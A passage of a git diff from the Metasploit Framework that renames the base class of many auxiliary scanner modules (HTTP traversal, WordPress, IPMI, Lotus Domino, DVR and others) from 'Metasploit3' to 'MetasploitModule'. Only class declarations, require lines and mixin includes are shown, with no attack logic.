Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb index 3c141366c7..d8e49a4e95 100644 --- a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb +++ b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index ede1e33c3c..b48d8560ae 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index 53af795bcb..80ffd465cd 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/symantec_web_gateway' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 4918004f32..580ab2f489 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb index 4b573346ae..937559cb2c 100644 --- a/modules/auxiliary/scanner/http/title.rb +++ b/modules/auxiliary/scanner/http/title.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient # Scanner mixin should be near last diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 9a4c1e244f..a11d0e9532 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 6847640f9c..58e644bda0 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/tomcat' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb index c4541ac09f..27181ef83c 100644 --- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb +++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 86472e9648..192a7cb395 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 188088b406..ab57d7cee5 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb index 46fc088080..2d035a031d 100644 --- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb +++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Typo3 include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 329ad2b77f..674b7dd855 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 48df7dd5e2..6a881c119d 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index 4d0484a96a..cea5ea796e 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -13,7 +13,7 @@ require 'cgi' - class Metasploit3 < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb index 163932d52a..399ce2cfc9 100644 --- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb +++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 9e768085ce..32f96c8d11 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index 74bf30c54b..9c79ae64a4 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 42970aac95..00fab61f82 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index 4fc1b55c75..489dea1a5e 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webpagetest_traversal.rb b/modules/auxiliary/scanner/http/webpagetest_traversal.rb index cb3381d0c8..4641786e14 100644 --- a/modules/auxiliary/scanner/http/webpagetest_traversal.rb +++ b/modules/auxiliary/scanner/http/webpagetest_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wildfly_traversal.rb b/modules/auxiliary/scanner/http/wildfly_traversal.rb index 6486a74948..3f79cd3b9f 100644 --- a/modules/auxiliary/scanner/http/wildfly_traversal.rb +++ b/modules/auxiliary/scanner/http/wildfly_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb index a9ae93a81b..34c8503a2a 100644 --- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb +++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index 9b804e4bb4..1576076911 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index 2019d21f71..72acdebe94 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb index d52d6c8f69..12f8841bbe 100644 --- a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb +++ b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_multicall' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 702d4b6bcc..32a55bdcbb 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_scanner.rb b/modules/auxiliary/scanner/http/wordpress_scanner.rb index e4c5feef18..c8249e2faf 100644 --- a/modules/auxiliary/scanner/http/wordpress_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index b46c204c6f..02f774518a 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_rpc' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb index 3892db3191..5284a81933 100644 --- a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb +++ b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb index 11c29161d2..1f8bf30ff2 100644 --- a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb index d4384810b1..33de5081ae 100644 --- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 1f9046447c..800c6a897f 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb index 88f9ca2081..fce1d04daf 100644 --- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb index 51404cbbd1..fa90614818 100644 --- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb index 7f0559721d..b4f21db7cf 100644 --- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb index 001e7a8f7a..736f5256b9 100644 --- a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index 4c6f1bcdfe..8ebe785795 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/yaws_traversal.rb b/modules/auxiliary/scanner/http/yaws_traversal.rb index 26e8aa1815..7947f768c2 100644 --- a/modules/auxiliary/scanner/http/yaws_traversal.rb +++ b/modules/auxiliary/scanner/http/yaws_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zabbix_login.rb b/modules/auxiliary/scanner/http/zabbix_login.rb index 878b786208..16256268f9 100644 --- a/modules/auxiliary/scanner/http/zabbix_login.rb +++ b/modules/auxiliary/scanner/http/zabbix_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/zabbix' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb index c50a870fe7..c950811aa6 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb index 095f3b2717..c17adaf2b9 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index 74ff3e3e3f..9999280be5 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Imap include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index aa3e1a9244..206908b32f 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'timeout' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index abc8d604bd..a8e64e9258 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb index c6d1f16d8e..6627284b08 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_version.rb b/modules/auxiliary/scanner/ipmi/ipmi_version.rb index 0c497970b6..ca209d0b99 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_version.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/kademlia/server_info.rb b/modules/auxiliary/scanner/kademlia/server_info.rb index 0f1c4508df..2eaf5ce94b 100644 --- a/modules/auxiliary/scanner/kademlia/server_info.rb +++ b/modules/auxiliary/scanner/kademlia/server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Kademlia diff --git a/modules/auxiliary/scanner/llmnr/query.rb b/modules/auxiliary/scanner/llmnr/query.rb index 74a8687efb..a09506761e 100644 --- a/modules/auxiliary/scanner/llmnr/query.rb +++ b/modules/auxiliary/scanner/llmnr/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::LLMNR diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 19a35e271d..7c4b0c7d2c 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index c3e9ac94a5..ba3eef232a 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 6df88ba9ee..f0c187ef91 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mdns/query.rb b/modules/auxiliary/scanner/mdns/query.rb index 4412818e31..507192479f 100644 --- a/modules/auxiliary/scanner/mdns/query.rb +++ b/modules/auxiliary/scanner/mdns/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::MDNS diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb index 2a1337914a..bede37a4c5 100644 --- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb +++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 427053995b..c2a0551cab 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -1,4 +1,4 @@ -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index c497a8ff3d..4d5b3fa724 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index e50e477f5e..c0a7fc5418 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index f62eb75a58..7601687f18 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/java/serialization' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Java::Rmi::Client include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/oki_scanner.rb b/modules/auxiliary/scanner/misc/oki_scanner.rb index 44f949da95..8eb2ee4019 100644 --- a/modules/auxiliary/scanner/misc/oki_scanner.rb +++ b/modules/auxiliary/scanner/misc/oki_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index 39a58fb004..110244aa82 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include 